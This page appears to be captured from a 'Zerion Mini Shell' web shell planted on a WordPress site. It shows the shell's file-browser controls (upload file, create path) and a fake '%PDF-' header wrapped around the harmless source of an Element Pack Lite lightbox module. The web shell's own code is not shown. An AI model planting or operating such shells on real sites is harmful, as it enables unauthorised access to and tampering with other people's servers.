%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tradesc/www/relax/wp-content/plugins/bdthemes-element-pack-lite/modules/lightbox/
Upload File :
Create Path :
Current File : /home/tradesc/www/relax/wp-content/plugins/bdthemes-element-pack-lite/modules/lightbox/module.php

<?php
namespace ElementPack\Modules\Lightbox;

use ElementPack\Base\Element_Pack_Module_Base;

if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly

class Module extends Element_Pack_Module_Base {

	public function get_name() {
		return 'lightbox';
	}

	public function get_widgets() {

		$widgets = [
			'Lightbox',
		];

		return $widgets;
	}
}

Zerion Mini Shell 1.0